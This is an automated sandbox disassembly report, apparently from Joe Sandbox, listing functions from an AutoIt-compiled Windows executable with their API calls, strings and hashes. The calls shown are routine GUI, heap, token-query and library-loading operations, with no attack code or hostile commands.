                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
                                                    • Instruction ID: fccdb3cd1a8c312c5af2c695ab21a349803ab3c2c1b133f86cdb07dca6b14540
                                                    • Opcode Fuzzy Hash: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
                                                    • Instruction Fuzzy Hash: 6A01A7B2601614BFDB105F58EC44BAA7FBEEF48752F140128FD08D2211E731DE4597A0
                                                    Function 006585F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00658608
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00658612
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00658621
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00658628
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0065863E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
                                                    • Instruction ID: eba81138c0c79762e2b6fd6084c6ba10ac52849df89212a4dc49d6279d9fa901
                                                    • Opcode Fuzzy Hash: 68387fb1f33f35cc773ba63c53e86664431e4104e3ae8ebd60d1c18186afc5d4
                                                    • Instruction Fuzzy Hash: C9F03C31201204BFEB100FA5DCDDEAB3BAEEF89755F100525F98597260DA619C45DB60
                                                    Function 00658652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658669
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00658673
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658682
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658689
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065869F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
                                                    • Instruction ID: 0fadfa8d7ee97af4a9c7900786478956d1158dc20cbd2cdb8d36c722a8a377e6
                                                    • Opcode Fuzzy Hash: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
                                                    • Instruction Fuzzy Hash: 60F0A970200314FFEB211FA4EC98EAB3BAEEF89755F140129FA49D3250DA619844DB60
                                                    Function 0065C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065C6BA
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0065C6D1
                                                    • MessageBeep.USER32(00000000), ref: 0065C6E9
                                                    • KillTimer.USER32(?,0000040A), ref: 0065C705
                                                    • EndDialog.USER32(?,00000001), ref: 0065C71F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: c4746be483fdea7c1515d09a7b7cc3e5773f0141b97a75398a1dc97da299a574
                                                    • Instruction ID: d01759a7936ab458084564056dc2a540d28b80b5fab7c56d7ace6db2a44a8201
                                                    • Opcode Fuzzy Hash: c4746be483fdea7c1515d09a7b7cc3e5773f0141b97a75398a1dc97da299a574
                                                    • Instruction Fuzzy Hash: 50016230500704AFEB215B20DD4EF9677BAFF04716F001769F942A15E1EBE5A9998F90
                                                    Function 006013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 006013BF
                                                    • StrokeAndFillPath.GDI32(?,?,0063BAD8,00000000,?), ref: 006013DB
                                                    • SelectObject.GDI32(?,00000000), ref: 006013EE
                                                    • DeleteObject.GDI32 ref: 00601401
                                                    • StrokePath.GDI32(?), ref: 0060141C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: cb88ee36fb4e99f0248f5dbadc284000db715c6d0d1fc5bddcf81f287449fe48
                                                    • Instruction ID: 5706e7da9b02b5fad1acdce3c448c7f157e392024bc6d3c3f45f21ee1e22e40f
                                                    • Opcode Fuzzy Hash: cb88ee36fb4e99f0248f5dbadc284000db715c6d0d1fc5bddcf81f287449fe48
                                                    • Instruction Fuzzy Hash: 04F0C430055608EFDB295F26EC1CBA93BE7AB02326F14A324F469891F1C73589A5DF64
                                                    Function 00612E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 00607BB1: _memmove.LIBCMT ref: 00607C0B
                                                    • __swprintf.LIBCMT ref: 0061302D
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00612EC6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 4a5a2446f498a4dd92d7d2ace7262dddcb7c46e571bad4448f3b5980c5f75408
                                                    • Instruction ID: a779c69f7aef7ce3ca77db323e5fdacab300c49302830bfd0f67f1a3fc3e8f99
                                                    • Opcode Fuzzy Hash: 4a5a2446f498a4dd92d7d2ace7262dddcb7c46e571bad4448f3b5980c5f75408
                                                    • Instruction Fuzzy Hash: 46919F715087159FC758EF24D885CAFB7E6EF99700F04091DF4829B2A1DB20EE89CB56
                                                    Function 0065B7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0065B981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container$%i
                                                    • API String ID: 3565006973-3322876330
                                                    • Opcode ID: 7aa57b9a40217574d070cae4a7ffb023d62ec5d4678e56d9ebb3b5f11ea0d04a
                                                    • Instruction ID: cf97640c92351b59647cee7fa5cd9419f6fe94b5bb2b623a1f635e46f809ca07
                                                    • Opcode Fuzzy Hash: 7aa57b9a40217574d070cae4a7ffb023d62ec5d4678e56d9ebb3b5f11ea0d04a
                                                    • Instruction Fuzzy Hash: E2916A70600601AFDB64CF24C884AAABBEAFF49711F10956DFD0ACB391DB70E845CB60
                                                    Function 0062524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 006252DD
                                                      • Part of subcall function 00630340: __87except.LIBCMT ref: 0063037B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: e6053d62909026b3205b839d2f4a0c684c927f0dfd7c928fffac8ad28f5e9031
                                                    • Instruction ID: 8ce959779fda34017f5325f51c1db4b89e8faea5abf9241421b0d9d42db2ad42
                                                    • Opcode Fuzzy Hash: e6053d62909026b3205b839d2f4a0c684c927f0dfd7c928fffac8ad28f5e9031
                                                    • Instruction Fuzzy Hash: 27516A21E1DE02D6E720BB14E9213FE27D79B00350F209959E486813E6EF74CED89EC6
                                                    Function 0062023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: 0121ac080f048e77a51ccac037ff889563f14b0c6b04aa8f5c8a75c29a115ada
                                                    • Instruction ID: 6ce5c920461bdf8a288adbb38ccd91533f397e63abdb28a85a1bdf53fabf5aae
                                                    • Opcode Fuzzy Hash: 0121ac080f048e77a51ccac037ff889563f14b0c6b04aa8f5c8a75c29a115ada
                                                    • Instruction Fuzzy Hash: 71515136100A16DFDF14EF28D8986FA7BB6EF1A310F140155EC829B3A1D7309C4ACB64
                                                    Function 00613297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_free
                                                    • String ID: Oaa
                                                    • API String ID: 2620147621-3268679879
                                                    • Opcode ID: 03ae10bf13f7f404b0945be490a22744c62e3ba5bf642686489c83eed10a1b00
                                                    • Instruction ID: 063890b9e341ec029ff427bd2812afe144f1a901d8da8544f1b823b57eda840c
                                                    • Opcode Fuzzy Hash: 03ae10bf13f7f404b0945be490a22744c62e3ba5bf642686489c83eed10a1b00
                                                    • Instruction Fuzzy Hash: 07515D715087519FDB64CF28C441BABBBE6AF85314F08492DE98AC7351DB31EA41CB92
                                                    Function 006162F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: ERCP
                                                    • API String ID: 2532777613-1384759551
                                                    • Opcode ID: 526b1099e989f58e11ddfdd01ef70001a5acf339d01a2d579dd42095adcf1f7b
                                                    • Instruction ID: b165db7b405a28714cf560c4afe0e1a50fcba43a9984dbf31450c210473bd7d2
                                                    • Opcode Fuzzy Hash: 526b1099e989f58e11ddfdd01ef70001a5acf339d01a2d579dd42095adcf1f7b
                                                    • Instruction Fuzzy Hash: 4251C0759007199BDB24CF65C881BEABBFAEF04314F24856EE94ACB241E770A685CB40
                                                    Function 00687648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006876D0
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006876E4
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00687708
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: 0ba3a64096bf6dfd964a1fea73ca3d98e2f5b66e57af33a6bdbbe05dbef73cc7
                                                    • Instruction ID: 2dc1e9d0c9e2ef5d3c90597d46b18b06b2b623584041fc96d508776f060411d4
                                                    • Opcode Fuzzy Hash: 0ba3a64096bf6dfd964a1fea73ca3d98e2f5b66e57af33a6bdbbe05dbef73cc7
                                                    • Instruction Fuzzy Hash: E721BF32500218BBDF119FA4CC42FEA3B6AEF48714F210214FE156B1D0DAB1E8918BA0
                                                    Function 00686F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00686FAA
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00686FBA
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00686FDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 41cf5be1fcd24d0c6bfd8adaabe91aa0ecbc42a6f8352402720850eb6839dd73
                                                    • Instruction ID: cfc1b07d0e9c4c2936573ed33c5781e90f0220cbb65779584219541acf19c205
                                                    • Opcode Fuzzy Hash: 41cf5be1fcd24d0c6bfd8adaabe91aa0ecbc42a6f8352402720850eb6839dd73
                                                    • Instruction Fuzzy Hash: 95219232610118BFDF119F54EC85EEB37ABEF89754F118224FA149B290CA71EC51CBA0
                                                    Function 0068797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006879E1
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006879F6
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00687A03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 0eceaa8c899b326327aae5105256cd6281a4d5ef2f04fb39895fd5af814d8371
                                                    • Instruction ID: d1f744a864d3e889e71320b515f9ed831903ec8fca5341ad3cd881cd142f0f05
                                                    • Opcode Fuzzy Hash: 0eceaa8c899b326327aae5105256cd6281a4d5ef2f04fb39895fd5af814d8371
                                                    • Instruction Fuzzy Hash: 6D112772244208BAEF14AF60CC05FEB37AEEF89764F110618F601A61D0D271D851CB20
                                                    Function 00604C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00604C2E), ref: 00604CA3
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00604CB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
                                                    • Instruction ID: b377c0d09a4e31a787ca125c3dc49bec3e813a44bbc9a38ce38e9c8e2da5acc1
                                                    • Opcode Fuzzy Hash: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
                                                    • Instruction Fuzzy Hash: D3D01270550723DFD7205F31DA1868676D7AF05751F11893998C5D6290DA70D480C750
                                                    Function 00604D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00604D2E,?,00604F4F,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604D6F
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00604D81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: b91dc905d178a63cc91eef0f72950d864919faca1be3be59e144a685f1eb5b39
                                                    • Instruction ID: 3b38f33c02d63af310a4647872fc6d156965c888310c9c97911ac250fe506aa6
                                                    • Opcode Fuzzy Hash: b91dc905d178a63cc91eef0f72950d864919faca1be3be59e144a685f1eb5b39
                                                    • Instruction Fuzzy Hash: 73D017B0650713DFD730AF31D80869676EAAF15762B129A3ED4C6D6290EAB0D8C0CB50
                                                    Function 00604D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00604CE1,?), ref: 00604DA2
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00604DB4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
